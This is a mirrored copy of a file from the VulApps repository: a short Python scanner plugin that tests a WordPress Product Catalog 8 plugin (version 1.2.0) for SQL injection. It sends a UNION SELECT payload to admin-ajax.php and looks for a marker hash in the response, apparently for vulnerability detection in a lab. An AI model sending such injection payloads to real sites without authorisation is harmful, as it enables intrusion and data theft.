mirror of
https://github.com/Medicean/VulApps.git
synced 2025-06-21 18:30:07 +00:00
30 lines
856 B
Bash
30 lines
856 B
Bash
#!/usr/bin/env python
|
|
# -*- coding: utf-8 -*-
|
|
# Generated by ptools
|
|
# __Author__ = Anonymous
|
|
# _PlugName_ = WordPress Plugin Product Catalog 8 1.2.0 - SQL Injection
|
|
# __Refer___ = https://www.exploit-db.com/exploits/40783/
|
|
|
|
import urllib
|
|
|
|
def assign(service,arg):
|
|
if service == fingerprint.wordpress:
|
|
return True, arg
|
|
|
|
def audit(arg):
|
|
target = arg + '/wp-admin/admin-ajax.php'
|
|
post_data = {
|
|
'selectedCategory': '0 UNION SELECT md5(1),2,3,4,5,6',
|
|
'action': 'UpdateCategoryList'
|
|
|
|
}
|
|
code, head, body, redirect_url, log = hackhttp.http(
|
|
target, post=urllib.urlencode(post_data))
|
|
if code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in body:
|
|
security_hole(target, log=log)
|
|
|
|
|
|
if __name__ == "__main__":
|
|
from dummy import *
|
|
audit(assign(fingerprint.wordpress, 'http://127.0.0.1:8080/')[1])
|